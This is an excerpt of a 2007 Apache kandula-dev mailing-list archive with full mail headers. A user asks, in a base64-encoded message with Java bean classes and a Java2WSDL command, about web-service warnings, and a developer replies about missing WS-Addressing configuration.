(161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 02 Aug 2007 13:05:36 -0700 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mx.inode.at) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 02 Aug 2007 20:05:27 +0000 Received: from [161.129.204.104] (port=7554 helo=margarita.erven.at) by smartmx-04.inode.at with esmtps (TLS-1.0:DHE_RSA_AES_256_CBC_SHA:32) (Exim 4.50) id 1IGgut-0003mm-NF for [email protected]; Thu, 02 Aug 2007 22:05:03 +0200 Received: from [161.129.204.104] (localhost [161.129.204.104]) by margarita.erven.at (Postfix) with ESMTP id E53F62330EB for <[email protected]>; Thu, 2 Aug 2007 22:05:00 +0200 (CEST) Message-ID: <[email protected]> Date: Thu, 02 Aug 2007 22:05:08 +0200 From: Hannes Erven <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20070604) MIME-Version: 1.0 To: [email protected] Subject: Re: problem about kandula References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=GB2312 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Hi =D6=F1=CE=B0=C8=C4, at a second look at the SOAP message you included, there are all the WS-Addressing things missing. I guess you did not include the client-config.wsdd file in the classpath of your client application, and that's why the transaction identifier is missing in the register request. But again, please tell us what you are trying to do. It seems you invented a new protocol identifier, on the big.tuwien.ac.at name space? -hannes --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Aug 06 10:40:15 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20467 invoked from network); 6 Aug 2007 10:40:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Aug 2007 10:40:11 -0000 Received: (qmail 37851 invoked by uid 500); 6 Aug 2007 10:40:10 -0000 Delivered-To: [email protected] Received: (qmail 37818 invoked by uid 500); 6 Aug 2007 10:40:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <kandula-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 37807 invoked by uid 99); 6 Aug 2007 10:40:10 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Aug 2007 03:40:10 -0700 X-ASF-Spam-Status: No, hits=3.5 required=10.0 tests=HTML_MESSAGE,SPF_PASS,WEIRD_PORT X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 06 Aug 2007 10:40:06 +0000 Received: by rv-out-0910.google.com with SMTP id g13so928791rvb for <[email protected]>; Mon, 06 Aug 2007 03:39:46 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type; b=GphC8KLOMrXaQargO+qv/QC+BEwEV5PkbPmNWzuSZZV4I0dCE1KgeIZWgoFJo0ScjjuYuaGztKCq0eketnwT6xRi3VLDjgEZngJxLvUBgoJ3eQUcYbHmj82vGSZLpRao0rS6CQcDJrOgVPHYwK11SOCoWJzK2Ulhph7LpB/IgyY= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type; b=irwaDbaFCItSXh1DV4Duasv3QqCXGFEy0bRVWFJHMk/BEKxV03p0VZe8d4o7csOjbe2KVBWZS4fuP2wHqpThrQ80Src1O3/087/oja2pAXhOohyhkqGrmQw1CAB2DnUhHqzwioyZaszsCOal192Bf9TZgXuuJrjLay8Dqtva+AM= Received: by 161.129.204.104 with SMTP id h16mr244530wfc.1186396785996; Mon, 06 Aug 2007 03:39:45 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 6 Aug 2007 03:39:45 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 6 Aug 2007 18:39:45 +0800 From: "=?GB2312?B?1vHOsMjE?=" <[email protected]> To: [email protected] Subject: problem about kandula MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_129594_26603023.1186396785973" X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_129594_26603023.1186396785973 Content-Type: text/plain; charset=GB2312 Content-Transfer-Encoding: base64 Content-Disposition: inline SGkgYWxsLGFnYWluOgogICAgIE5vdyxJIHdhbnQgd3JpdGUgYSBzaW1wbGUgdGVzdCBleGFtcGxl IGJ5IG15c2VsZiB1c2luZyBrYW5kdWxhLlNvIEkKbXVzdCB3cml0ZSBhIFdlYnNlcnZpY2UgZmly c3QuSSBjaG9vc2UgdXNpbmcgdGhlIHRvb2wgLS0iamF2YTJ3c2RsIi5CdXQgSXQKYWx3YXlzIGFw cGVhciB0aGUgd2FybmluZzoKIr6vuOY6IFRoZSBjbGFzcyBvcmcuYXBhY2hlLmF4aXMubWVzc2Fn ZS5hZGRyZXNzaW5nLkF0dHJpYnV0ZWRRTmFtZSBkb2VzIG5vdApjb250CmFpbiBhIGRlZmF1bHQg Y29uc3RydWN0b3IsIHdoaWNoIGlzIGEgcmVxdWlyZW1lbnQgZm9yIGEgYmVhbiBjbGFzcy4gIFRo ZQpjbGFzcyBjCmFubm90IGJlIGNvbnZlcnRlZCBpbnRvIGFuIHhtbCBzY2hlbWEgdHlwZS4gIEFu IHhtbCBzY2hlbWEgYW55VHlwZSB3aWxsIGJlCnVzZWQKdG8gZGVmaW5lIHRoaXMgY2xhc3MgaW4g dGhlIHdzZGwgZmlsZS4KMjAwNy04LTYgMTc6NTg6NDkgb3JnLmFwYWNoZS5heGlzLndzZGwuZnJv bUphdmEuVHlwZXMgaXNCZWFuQ29tcGF0aWJsZQq+r7jmOiBUaGUgY2xhc3Mgb3JnLmFwYWNoZS5h eGlzLm1lc3NhZ2UuYWRkcmVzc2luZy5TZXJ2aWNlTmFtZVR5cGUgZG9lcyBub3QKY29udAphaW4g YSBkZWZhdWx0IGNvbnN0cnVjdG9yLCB3aGljaCBpcyBhIHJlcXVpcmVtZW50IGZvciBhIGJlYW4g Y2xhc3MuICBUaGUKY2xhc3MgYwphbm5vdCBiZSBjb252ZXJ0ZWQgaW50byBhbiB4bWwgc2NoZW1h IHR5cGUuICBBbiB4bWwgc2NoZW1hIGFueVR5cGUgd2lsbCBiZQp1c2VkCnRvIGRlZmluZSB0aGlz IGNsYXNzIGluIHRoZSB3c2RsIGZpbGUuIgpJIGRvbid0IGtub3cgSG93IHRvIHNvbHZlIGl0LkFu eW9uZSBjYW4gaGVscCBtZSA/dGhhbmsgeW91IHZlcnkgbXVjaC4KIGZvbGxvd2luZyBpcyB0aGUg c291cmNlY29kZSA6Ckl0IGhhdmUgNCBjbGFzc2VzCi0tLS0tLS0tLS0tLS0tLS0tLS0tCgoxLkNv bnRleHRDaG9pY2VUeXBlIC0tLS0tLS0tLS10aGUgcHJvYmxlbSBjbGFzcwoKcGFja2FnZSByencu Y29tcHV0ZXI7CgpwdWJsaWMgY2xhc3MgQ29udGV4dENob2ljZVR5cGUgewogcHJpdmF0ZSBvcmcu YXBhY2hlLmthbmR1bGEud3Njb29yLkNvb3JkaW5hdGlvbkNvbnRleHQgY29vcmRpbmF0aW9uQ29u dGV4dDsKCiBwdWJsaWMgQ29udGV4dENob2ljZVR5cGUoKSB7CiB9CgogcHVibGljIENvbnRleHRD aG9pY2VUeXBlKAogICBvcmcuYXBhY2hlLmthbmR1bGEud3Njb29yLkNvb3JkaW5hdGlvbkNvbnRl eHQgY29vcmRpbmF0aW9uQ29udGV4dCkgewogIHRoaXMuY29vcmRpbmF0aW9uQ29udGV4dCA9IGNv b3JkaW5hdGlvbkNvbnRleHQ7CiB9CgogcHVibGljIG9yZy5hcGFjaGUua2FuZHVsYS53c2Nvb3Iu Q29vcmRpbmF0aW9uQ29udGV4dGdldENvb3JkaW5hdGlvbkNvbnRleHQoKSB7CiAgcmV0dXJuIGNv b3JkaW5hdGlvbkNvbnRleHQ7CiB9CgogcHVibGljIHZvaWQgc2V0Q29vcmRpbmF0aW9uQ29udGV4 dCgKICAgb3JnLmFwYWNoZS5rYW5kdWxhLndzY29vci5Db29yZGluYXRpb25Db250ZXh0IGNvb3Jk aW5hdGlvbkNvbnRleHQpIHsKICB0aGlzLmNvb3JkaW5hdGlvbkNvbnRleHQgPSBjb29yZGluYXRp b25Db250ZXh0OwogfQp9CgoyLktleUJvYXJkUmVxdWVzdAoKcGFja2FnZSByencuY29tcHV0ZXI7 CgpwdWJsaWMgY2xhc3MgS2V5Qm9hcmRSZXF1ZXN0IHsKIHByaXZhdGUgaW50IG51bSA9IDA7CiBD b250ZXh0Q2hvaWNlVHlwZSBjb250ZXh0Q2hvaWNlVHlwZSA9IG51bGw7CgogcHVibGljIEtleUJv YXJkUmVxdWVzdCgpIHsKCiB9CgogcHVibGljIEtleUJvYXJkUmVxdWVzdChpbnQgbnVtLCBDb250 ZXh0Q2hvaWNlVHlwZSBjb250ZXh0KSB7CiAgdGhpcy5udW0gPSBudW07CiAgdGhpcy5jb250ZXh0 Q2hvaWNlVHlwZSA9IGNvbnRleHQ7CiB9CgogcHVibGljIGludCBnZXROdW0oKSB7CiAgcmV0dXJu IG51bTsKIH0KCiBwdWJsaWMgdm9pZCBzZXROdW0oaW50IG51bSkgewogIHRoaXMubnVtID0gbnVt OwogfQoKIHB1YmxpYyBDb250ZXh0Q2hvaWNlVHlwZSBnZXRDb250ZXh0Q2hvaWNlVHlwZSgpIHsK ICByZXR1cm4gY29udGV4dENob2ljZVR5cGU7CiB9CgogcHVibGljIHZvaWQgc2V0Q29udGV4dENo b2ljZVR5cGUoQ29udGV4dENob2ljZVR5cGUgY29udGV4dENob2ljZVR5cGUpIHsKICB0aGlzLmNv bnRleHRDaG9pY2VUeXBlID0gY29udGV4dENob2ljZVR5cGU7CiB9Cgp9CgozLiBLZXlCb2FyZFJl c3BvbnNlCgpwYWNrYWdlIHJ6dy5jb21wdXRlcjsKCnB1YmxpYyBjbGFzcyBLZXlCb2FyZFJlc3Bv bnNlIHsKIHB1YmxpYyBib29sZWFuIGRlYWwgPSBmYWxzZTsKCiBwdWJsaWMgaW50IHJlc3VsdG51 bSA9IDA7CgogcHVibGljIEtleUJvYXJkUmVzcG9uc2UoKSB7CgogfQoKIHB1YmxpYyBib29sZWFu IGlzRGVhbCgpIHsKICByZXR1cm4gZGVhbDsKIH0KCiBwdWJsaWMgdm9pZCBzZXREZWFsKGJvb2xl YW4gZGVhbCkgewogIHRoaXMuZGVhbCA9IGRlYWw7CiB9CgogcHVibGljIGludCBnZXRSZXN1bHRu dW0oKSB7CiAgcmV0dXJuIHJlc3VsdG51bTsKIH0KCiBwdWJsaWMgdm9pZCBzZXRSZXN1bHRudW0o aW50IHJlc3VsdG51bSkgewogIHRoaXMucmVzdWx0bnVtID0gcmVzdWx0bnVtOwogfQoKfQoKNC5L ZXlCb2FyZFNlcnZpY2UKCnBhY2thZ2Ugcnp3LmNvbXB1dGVyOwoKcHVibGljIGludGVyZmFjZSBL ZXlCb2FyZFNlcnZpY2UgewogcHVibGljIEtleUJvYXJkUmVzcG9uc2UgZG9BY3RpdmUoS2V5Qm9h cmRSZXF1ZXN0IHJlcXVlc3QpOwp9Cgo1LiB0aGUgLmJhdCBmaWxlIGlzIDoKCmphdmEgb3JnLmFw YWNoZS5heGlzLndzZGwuSmF2YTJXU0RMIC1va2V5Ym9hcmQud3NkbCAtbCIKaHR0cDovL2xvY2Fs aG9zdDo4MTgwL2F4aXMvc2VydmljZXMvS2V5Qm9hcmRTZXJ2aWNlIiAtbiAidXJuOmNvbXB1dGVy LnJ6dyIKLXAiIHJ6dy5jb21wdXRlciIgInVybjpjb21wdXRlci5yenciIHJ6dy5jb21wdXRlci5L ZXlCb2FyZFNlcnZpY2UKCgoKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQoKQW5k IHRoZSBhdHRhY2hlZCBmaWxlIGlzIG15IHdob2xlIGRlbW8gLkFuZCBpdCBjYW4gbm90IHJ1biBp ZiAgSSBhZGQKQ29vcmRpbmF0aW9uQ29udGV4dCBpbiBjbGFzcyBDb250ZXh0Q2hvaWNlVHlwZS5C dXQgaWYgSSBkb24ndCBhZGQgYWRkCkNvb3JkaW5hdGlvbkNvbnRleHQgaW4gY2xhc3MgQ29udGV4 dENob2ljZVR5cGUsaXQgd2lsbCBydW4gdmVyeSB3ZWxsLgoKSSBob3BlIHNvbWUgb25lIGNhbiBo ZWxwIG1lLnRoYW5rIHlvdSAuCgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0KCkFub3RoZXIgcHJvYmxlbSBpcyBhYm91dCAgX2NhbGwuc2V0U09BUEFjdGlvblVSSSgiPz8/ Pz8iKSBpbiBjbGFzcwpLZXlCb2FyZFNlcnZpY2VTb2FwQmluZGluZ1N0dWIgLldoYXQgc2hvdWxk IEkgd3JpdGUgaW4gaXQgcmVwbGFjZSB0aGUgIj8/PyI/Ci0tIAogICAgICAgICAgICAgICDIxNbx zrAKsbG+qdPKtee089GnIFBDTiZDQUTW0NDECg== ------=_Part_129594_26603023.1186396785973 Content-Type: text/html; charset=GB2312 Content-Transfer-Encoding: base64 Content-Disposition: inline PGRpdj5IaSBhbGwsYWdhaW46PC9kaXY+CjxkaXY+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i c3A7Tm93LEkgd2FudCB3cml0ZSBhIHNpbXBsZSB0ZXN0IGV4YW1wbGUgYnkgbXlzZWxmIHVzaW5n IGthbmR1bGEuU28gSSBtdXN0IHdyaXRlIGEgV2Vic2VydmljZSBmaXJzdC5JIGNob29zZSB1c2lu ZyB0aGUgdG9vbCAtLSZxdW90O2phdmEyd3NkbCZxdW90Oy5CdXQgSXQgYWx3YXlzIGFwcGVhciB0 aGUgd2FybmluZzo8L2Rpdj4KPGRpdj48Zm9udCBzdHlsZT0iQkFDS0dST1VORC1DT0xPUjogI2Zm ZmZmZiI+JnF1b3Q7PC9mb250Pjxmb250IHN0eWxlPSJCQUNLR1JPVU5ELUNPTE9SOiAjZmZmZmZm IiBjb2xvcj0iI2ZmNjY2NiI+vq+45jogVGhlIGNsYXNzIG9yZy5hcGFjaGUuYXhpcy5tZXNzYWdl LmFkZHJlc3NpbmcuQXR0cmlidXRlZFFOYW1lIGRvZXMgbm90IGNvbnQ8YnI+YWluIGEgZGVmYXVs dCBjb25zdHJ1Y3Rvciwgd2hpY2ggaXMgYSByZXF1aXJlbWVudCBmb3IgYSBiZWFuIGNsYXNzLiZu YnNwOyBUaGUgY2xhc3MgYyAKPGJyPmFubm90IGJlIGNvbnZlcnRlZCBpbnRvIGFuIHhtbCBzY2hl bWEgdHlwZS4mbmJzcDsgQW4geG1sIHNjaGVtYSBhbnlUeXBlIHdpbGwgYmUgdXNlZDxicj50byBk ZWZpbmUgdGhpcyBjbGFzcyBpbiB0aGUgd3NkbCBmaWxlLjxicj4yMDA3LTgtNiAxNzo1ODo0OSBv cmcuYXBhY2hlLmF4aXMud3NkbC5mcm9tSmF2YS5UeXBlcyBpc0JlYW5Db21wYXRpYmxlPGJyPr6v uOY6IFRoZSBjbGFzcyBvcmcuYXBhY2hlLmF4aXMubWVzc2FnZS5hZGRyZXNzaW5nLlNlcnZpY2VO YW1lVHlwZQogZG9lcyBub3QgY29udDxicj5haW4gYSBkZWZhdWx0IGNvbnN0cnVjdG9yLCB3aGlj aCBpcyBhIHJlcXVpcmVtZW50IGZvciBhIGJlYW4gY2xhc3MuJm5ic3A7IFRoZSBjbGFzcyBjPGJy PmFubm90IGJlIGNvbnZlcnRlZCBpbnRvIGFuIHhtbCBzY2hlbWEgdHlwZS4mbmJzcDsgQW4geG1s IHNjaGVtYSBhbnlUeXBlIHdpbGwgYmUgdXNlZDxicj50byBkZWZpbmUgdGhpcyBjbGFzcyBpbiB0 aGUgd3NkbCBmaWxlLiZxdW90OyAKPC9mb250PjwvZGl2Pgo8ZGl2Pjxmb250IGNvbG9yPSIjMDAw MDAwIj5JIGRvbiYjMzk7dCBrbm93IEhvdyB0byBzb2x2ZSBpdC5BbnlvbmUgY2FuIGhlbHAgbWUg P3RoYW5rIHlvdSB2ZXJ5IG11Y2guPC9mb250PjwvZGl2Pgo8ZGl2PiZuYnNwO2ZvbGxvd2luZyBp cyB0aGUgc291cmNlY29kZSZuYnNwOzo8L2Rpdj4KPGRpdj5JdCBoYXZlIDQgY2xhc3NlczwvZGl2 Pgo8ZGl2Pi0tLS0tLS0tLS0tLS0tLS0tLS0tPC9kaXY+CjxkaXY+CjxwPjxmb250IHN0eWxlPSJC QUNLR1JPVU5ELUNPTE9SOiAjZmYwMDAwIj4xLkNvbnRleHRDaG9pY2VUeXBlIC0tLS0tLS0tLS10 aGUgcHJvYmxlbSBjbGFzczwvZm9udD4gPC9wPgo8cD5wYWNrYWdlIHJ6dy5jb21wdXRlcjs8L3A+ CjxwPnB1YmxpYyBjbGFzcyBDb250ZXh0Q2hvaWNlVHlwZSB7PGJyPiZuYnNwO3ByaXZhdGUgb3Jn LmFwYWNoZS5rYW5kdWxhLndzY29vci5Db29yZGluYXRpb25Db250ZXh0IGNvb3JkaW5hdGlvbkNv bnRleHQ7PC9wPgo8cD4mbmJzcDtwdWJsaWMgQ29udGV4dENob2ljZVR5cGUoKSB7PGJyPiZuYnNw O308L3A+CjxwPiZuYnNwO3B1YmxpYyBDb250ZXh0Q2hvaWNlVHlwZSg8YnI+Jm5ic3A7Jm5ic3A7 Jm5ic3A7b3JnLmFwYWNoZS5rYW5kdWxhLndzY29vci5Db29yZGluYXRpb25Db250ZXh0IGNvb3Jk aW5hdGlvbkNvbnRleHQpIHs8YnI+Jm5ic3A7Jm5ic3A7dGhpcy5jb29yZGluYXRpb25Db250ZXh0 ID0gY29vcmRpbmF0aW9uQ29udGV4dDs8YnI+Jm5ic3A7fTwvcD4KPHA+Jm5ic3A7cHVibGljIG9y Zy5hcGFjaGUua2FuZHVsYS53c2Nvb3IuQ29vcmRpbmF0aW9uQ29udGV4dCBnZXRDb29yZGluYXRp b25Db250ZXh0KCkgezxicj4mbmJzcDsmbmJzcDtyZXR1cm4gY29vcmRpbmF0aW9uQ29udGV4dDs8 YnI+Jm5ic3A7fTwvcD4KPHA+Jm5ic3A7cHVibGljIHZvaWQgc2V0Q29vcmRpbmF0aW9uQ29udGV4 dCg8YnI+Jm5ic3A7Jm5ic3A7Jm5ic3A7b3JnLmFwYWNoZS5rYW5kdWxhLndzY29vci5Db29yZGlu YXRpb25Db250ZXh0IGNvb3JkaW5hdGlvbkNvbnRleHQpIHs8YnI+Jm5ic3A7Jm5ic3A7dGhpcy5j b29yZGluYXRpb25Db250ZXh0ID0gY29vcmRpbmF0aW9uQ29udGV4dDs8YnI+Jm5ic3A7fTxicj59 PGZvbnQgY29sb3I9IiNmZmZmZmYiPjxmb250IHN0eWxlPSJCQUNLR1JPVU5ELUNPTE9SOiAjMzM2 NmZmIj4KPGJyIGNsZWFyPSJhbGwiPjwvZm9udD48L2ZvbnQ+PC9wPgo8cD4yLktleUJvYXJkUmVx dWVzdCA8L3A+CjxwPnBhY2thZ2Ugcnp3LmNvbXB1dGVyOzwvcD4KPHA+cHVibGljIGNsYXNzIEtl eUJvYXJkUmVxdWVzdCB7PGJyPiZuYnNwO3ByaXZhdGUgaW50IG51bSA9IDA7PGJyPiZuYnNwO0Nv bnRleHRDaG9pY2VUeXBlIGNvbnRleHRDaG9pY2VUeXBlID0gbnVsbDs8L3A+CjxwPiZuYnNwO3B1 YmxpYyBLZXlCb2FyZFJlcXVlc3QoKSB7PC9wPgo8cD4mbmJzcDt9PC9wPgo8cD4mbmJzcDtwdWJs aWMgS2V5Qm9hcmRSZXF1ZXN0KGludCBudW0sIENvbnRleHRDaG9pY2VUeXBlIGNvbnRleHQpIHs8 YnI+Jm5ic3A7Jm5ic3A7dGhpcy5udW0gPSBudW07PGJyPiZuYnNwOyZuYnNwO3RoaXMuY29udGV4 dENob2ljZVR5cGUgPSBjb250ZXh0Ozxicj4mbmJzcDt9PC9wPgo8cD4mbmJzcDtwdWJsaWMgaW50 IGdldE51bSgpIHs8YnI+Jm5ic3A7Jm5ic3A7cmV0dXJuIG51bTs8YnI+Jm5ic3A7fTwvcD4KPHA+ Jm5ic3A7cHVibGljIHZvaWQgc2V0TnVtKGludCBudW0pIHs8YnI+Jm5ic3A7Jm5ic3A7dGhpcy5u dW0gPSBudW07PGJyPiZuYnNwO308L3A+CjxwPiZuYnNwO3B1YmxpYyBDb250ZXh0Q2hvaWNlVHlw ZSBnZXRDb250ZXh0Q2hvaWNlVHlwZSgpIHs8YnI+Jm5ic3A7Jm5ic3A7cmV0dXJuIGNvbnRleHRD aG9pY2VUeXBlOzxicj4mbmJzcDt9PC9wPgo8cD4mbmJzcDtwdWJsaWMgdm9pZCBzZXRDb250ZXh0 Q2hvaWNlVHlwZShDb250ZXh0Q2hvaWNlVHlwZSBjb250ZXh0Q2hvaWNlVHlwZSkgezxicj4mbmJz cDsmbmJzcDt0aGlzLmNvbnRleHRDaG9pY2VUeXBlID0gY29udGV4dENob2ljZVR5cGU7PGJyPiZu YnNwO308L3A+CjxwPn08L3A+CjxwPjMuIEtleUJvYXJkUmVzcG9uc2U8L3A+CjxwPnBhY2thZ2Ug cnp3LmNvbXB1dGVyOzwvcD4KPHA+cHVibGljIGNsYXNzIEtleUJvYXJkUmVzcG9uc2Ugezxicj4m bmJzcDtwdWJsaWMgYm9vbGVhbiBkZWFsID0gZmFsc2U7PC9wPgo8cD4mbmJzcDtwdWJsaWMgaW50 IHJlc3VsdG51bSA9IDA7PC9wPgo8cD4mbmJzcDtwdWJsaWMgS2V5Qm9hcmRSZXNwb25zZSgpIHs8 L3A+CjxwPiZuYnNwO308L3A+CjxwPiZuYnNwO3B1YmxpYyBib29sZWFuIGlzRGVhbCgpIHs8YnI+ Jm5ic3A7Jm5ic3A7cmV0dXJuIGRlYWw7PGJyPiZuYnNwO308L3A+CjxwPiZuYnNwO3B1YmxpYyB2 b2lkIHNldERlYWwoYm9vbGVhbiBkZWFsKSB7PGJyPiZuYnNwOyZuYnNwO3RoaXMuZGVhbCA9IGRl YWw7PGJyPiZuYnNwO308L3A+CjxwPiZuYnNwO3B1YmxpYyBpbnQgZ2V0UmVzdWx0bnVtKCkgezxi cj4mbmJzcDsmbmJzcDtyZXR1cm4gcmVzdWx0bnVtOzxicj4mbmJzcDt9PC9wPgo8cD4mbmJzcDtw dWJsaWMgdm9pZCBzZXRSZXN1bHRudW0oaW50IHJlc3VsdG51bSkgezxicj4mbmJzcDsmbmJzcDt0 aGlzLnJlc3VsdG51bSA9IHJlc3VsdG51bTs8YnI+Jm5ic3A7fTwvcD4KPHA+fTxicj48L3A+Cjxw PjQuS2V5Qm9hcmRTZXJ2aWNlPC9wPgo8cD5wYWNrYWdlIHJ6dy5jb21wdXRlcjs8L3A+CjxwPnB1 YmxpYyBpbnRlcmZhY2UgS2V5Qm9hcmRTZXJ2aWNlIHs8YnI+Jm5ic3A7cHVibGljIEtleUJvYXJk UmVzcG9uc2UgZG9BY3RpdmUoS2V5Qm9hcmRSZXF1ZXN0IHJlcXVlc3QpOzxicj59PGJyPjwvcD4K PHA+NS4gdGhlIC5iYXQgZmlsZSBpcyA6PC9wPgo8cD5qYXZhIG9yZy5hcGFjaGUuYXhpcy53c2Rs LkphdmEyV1NETCAtb2tleWJvYXJkLndzZGwgLWwmcXVvdDs8YSBvbmNsaWNrPSJyZXR1cm4gdG9w LmpzLk9wZW5FeHRMaW5rKHdpbmRvdyxldmVudCx0aGlzKSIgaHJlZj0iaHR0cDovL2xvY2FsaG9z dDo4MTgwL2F4aXMvc2VydmljZXMvS2V5Qm9hcmRTZXJ2aWNlIiB0YXJnZXQ9Il9ibGFuayI+aHR0 cDovL2xvY2FsaG9zdDo4MTgwL2F4aXMvc2VydmljZXMvS2V5Qm9hcmRTZXJ2aWNlCjwvYT4mcXVv dDsgLW4gJnF1b3Q7dXJuOmNvbXB1dGVyLnJ6dyZxdW90OyAtcCZxdW90OyByencuY29tcHV0ZXIm cXVvdDsgJnF1b3Q7dXJuOmNvbXB1dGVyLnJ6dyZxdW90OyByencuY29tcHV0ZXIuS2V5Qm9hcmRT ZXJ2aWNlPC9wPgo8cD4mbmJzcDs8L3A+CjxwPi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS08L3A+CjxwPkFuZCB0aGUgYXR0YWNoZWQgZmlsZSBpcyBteSB3aG9sZSBkZW1vIC5BbmQg aXQgY2FuIG5vdCBydW4gaWYmbmJzcDsgSSBhZGQgQ29vcmRpbmF0aW9uQ29udGV4dCBpbiBjbGFz cyA8Zm9udCBzdHlsZT0iQkFDS0dST1VORC1DT0xPUjogI2ZmMDAwMCI+Q29udGV4dENob2ljZVR5 cGUuPC9mb250Pjxmb250IHN0eWxlPSJCQUNLR1JPVU5ELUNPTE9SOiAjZmZmZmZmIj5CdXQgaWYg SSBkb24mIzM5O3QgYWRkIGFkZCBDb29yZGluYXRpb25Db250ZXh0IGluIGNsYXNzIAo8L2ZvbnQ+ PGZvbnQgc3R5bGU9IkJBQ0tHUk9VTkQtQ09MT1I6ICNmZmZmZmYiPkNvbnRleHRDaG9pY2VUeXBl LGl0IHdpbGwgcnVuIHZlcnkgd2VsbC48L2ZvbnQ+PC9wPgo8cD5JIGhvcGUgc29tZSBvbmUgY2Fu IGhlbHAgbWUudGhhbmsgeW91IC48L3A+CjxwPi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLTwvcD4KPHA+QW5vdGhlciBwcm9ibGVtJm5ic3A7aXMgYWJvdXQgJm5ic3A7X2Nh bGwuc2V0U09BUEFjdGlvblVSSSgmcXVvdDs/Pz8/PyZxdW90OykgaW4gY2xhc3MgS2V5Qm9hcmRT ZXJ2aWNlU29hcEJpbmRpbmdTdHViIC5XaGF0IHNob3VsZCBJIHdyaXRlIGluIGl0IHJlcGxhY2Ug dGhlICZxdW90Oz8/PyZxdW90Oz88YnI+LS0gPGJyPiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZu YnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNw OyDIxNbxzrA8YnI+sbG+qdPKtee089GnIFBDTiZhbXA7Q0FE1tDQxCAKPC9wPjwvZGl2Pgo= ------=_Part_129594_26603023.1186396785973-- From [email protected] Wed Aug 08 03:35:41 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56102 invoked from network); 8 Aug 2007 03:35:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Aug 2007 03:35:40 -0000 Received: (qmail 90296 invoked by uid 500); 8 Aug 2007 03:35:38 -0000 Delivered-To: [email protected] Received: (qmail 90249 invoked by uid 500); 8 Aug 2007 03:35:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <kandula-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 90236 invoked by uid 99); 8 Aug 2007 03:35:38 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 07 Aug 2007 20:35:38 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Aug 2007 03:35:33 +0000 Received: by rv-out-0910.google.com with SMTP id c24so21568rvf for <[email protected]>; Tue, 07 Aug 2007 20:35:13 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:cc:mime-version:content-type; b=eyFPJaqvQ+se1fJO9Wluvyr7WBgtGMB29NAnPHrxBvAdEplHS+0np29ocpxwht73cZjce23Z0UhEqoSSrdoESSEAiAnXSixBnZ4RyG7v1hA9DJFBl4gBk6xepYqoAEv0HaCTKtae2NEZLxwpIytYJ8B5C0MkMFJ16F9Ve2rnZeg= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; 